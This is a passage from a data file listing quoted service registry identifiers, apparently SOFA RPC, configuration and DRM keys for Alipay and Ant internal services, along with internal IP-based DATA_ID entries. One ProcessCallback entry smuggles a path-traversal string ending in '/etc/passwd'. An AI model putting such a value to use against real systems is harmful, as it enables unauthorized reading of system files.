service.integration.drm.resource.SwitchExterfaceInvokeToUtpResource.batchRefundPwdOutBlack,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.AuthorizationAdapterFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.mobilesearch.GlobalSearchFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paydecision.DecisionRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfcenter.common.service.facade.ApInvoiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.zpaas.zappinfo.facade.query.AigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instrtdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicreateweb.api.Ucdp:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.hall.HallServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.trade.facade.basetrade.SellerRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:promoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.outflux.OutfluxRequestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.TransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.forbiddenTenantsOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.130.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cashiercore.service.facade.api.CashiercorePayService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityprodmng.common.service.facade.feature.SecurityFeatureRefQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.paymentmng_SHAREDATADataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.follow.BatchFollowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.200.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.share.PortfolioProfitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.market.SocialItemOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.course.CourseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fcrcportal:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_COMMUNITYPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.facade.signature.SignatureUtilFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.mcc.MccInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:flowPositionAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.fpPreAuthCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ordercore.common.service.facade.OrderOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbticketcenter.common.service.facade.api.TicketOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpartner.common.service.facade.RebateQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promocenter.common.manage.facade.api.solution.SolutionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antappdoppler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.downGradeReminderCountHbaseQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.74.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antiep.common.service.facade.AntiepSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.FileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfarm.common.service.facade.AntfarmQueryProjectInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ikbservcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.dassmetaDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.facade.service.YebIncomeInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.advert.LifeAdvertAppListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.ZcbAssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.audiomessage.AudioChannelNearClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.194.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfuse.common.service.facade.PostTaskExecuteService:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.fundCouponMinAlertThresholdRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.RepayWithdrawCmd.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:instdatalink@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.VerifyCallbackFacade:1.0:mobileapp_face_login@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instservicegovern@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.yyml.repo.FinsBizConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.query.ProductConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.EsuTaskFacade:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.209.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.manager.RoleManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finappconfig.common.service.facade.fdata.api.FopBizDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstrategycenter.common.service.facade.StrategyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aladdin.common.service.facade.SynonymManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryDailyBalanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tscenter.common.service.facade.OpenDeviceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csplatform.service.facade.api.TairOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.channel.spi.ChannelValidateProductValidateService:1.0:mobileic-mock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurity.common.service.facade.emergency.ApiFactoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.RuleCheckCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.InspectionResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccore.facade.FinInfoReceiverTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antassistant.common.service.facade.api.VoiceBotFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mif_antProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.CompensationConsultService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dmpservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:uif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.RegisterInstBillService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iusergrowthus.facade.api.LotteryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.tradequery.common.service.facade.TradeLogisticsQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditdmp.facade.PcdmpOrgPublishManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.StagedPaymentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.AppStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscommunity.biz.mutual.service.PlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finadvisorprod.common.service.facade.api.SelectUserAdminUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowProblemCategoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.biz.schedule.dailycheck.DailyCheckExecuter:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:grmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.39.187.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gpwebcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.progov.service.api.ProdRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ICFMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbretailprod.common.facade.item.ItemShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:huanyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_OAUTH_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.FundBankFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmobile.common.service.community.facade.ReplyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PolicyUrlFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.shopservice.ShopSpecServiceQuery4ManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.cloud.osp.instance.facade.MeterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.frdspcore.common.service.facade.api.DecisionSchemeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.100.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.ebppgw.facade.industry.IndustrygwMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchorder.orderdatacenter.facade.service.OrderDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openauth.common.service.facade.rpc.IAMPermitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.riskmng.biz.crp.drm.CompositeStrategyDrmResource.customer,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.model.ModelProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.common.dal.promocoreshare.manual.daointerface.AntPageFlowNodeDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:pcreditdecisionxAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_LIFEMOCK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.128.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.financeprod.financing.api.facade.FinancingProductAndAssetsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.DstMixInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","meshyorg@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.dataquality:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.policy.service.facade.mng.api.FactorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_vehownerprod_etc#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.128.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizfund.common.service.facade.bizorder.BizOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchcommerce.core.api.biz.authority.AuthorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mservicesinspect.service.facade.service.DataSyncInspectService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.AllInPayConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcprodbx-insmobile:name=com.alipay.fc.prodbx.common.drm.impl.DrmResourceServiceImpl.detailLogLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antfin.inclusionconf.facade.service.common.OrderPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.CategoryConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.22.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.taxDeferRetryErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.kbproxy.api.test.TrServiceTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.facade.StandardValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecquery.common.service.repay.AccountBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.dynamiccode.DynamicCodeToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mitemcenter.common.service.facade.api.query.NameInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:ternbaseforinternet#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.phaseQueryJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.125.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dmirror-common-service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-asttshipcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.173.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.core.schduler.v2.api.FincomGeneralFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_BAOXIANVALUE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmissione.common.service.facade.BudgetApproveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountAdjust_SysCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.sync.ParmSchemaPropertyMapperQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.risklib.common.mw.wtable.client.WTableReadClient:1.0:eventRead@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.141.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:atdatacollect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.32.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundmng.core.service.shard.MfRdOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.FxClearSettleAgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_DEPOSITBACK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:tscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.riskmng.ruleDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.164.151.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.metadataLoadingMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.topicpush.TopicPushTestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.service.BenefitRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.EcoAuditDetectConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.SubjectModuleServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.scenecustom.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.content.YuemaElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cfmng.service.client.fundboss.drm.FBLinkReconDrm.openAntq,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseTenantFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ccdc.common.service.facade.NoSensiCardInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.MerchantP2pAlgoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ccr.facade.InstitutionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.ChannelBatchQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.task.facade.TaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchprod.globalsite.facade.api.merchantcase.MerchantCaseOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsceneyebprod.common.service.facade.api.task.TaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.product.IotProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:polaristwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exratecenter.service.facade.api.ExClientRateQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub1:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.settling.common.service.facade.SettlingOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.prodmng.core.service.drm.impl.ShowChargeModeProductDRMImpl.products,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.security.ContentLegalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.scheduler.SpecAppointmentDaemonForTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.InvoiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.printHaCheckResultDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.admin.MiniAppAuditUserMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.writeFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reading.common.service.facade.game.GameMatcherFacade:1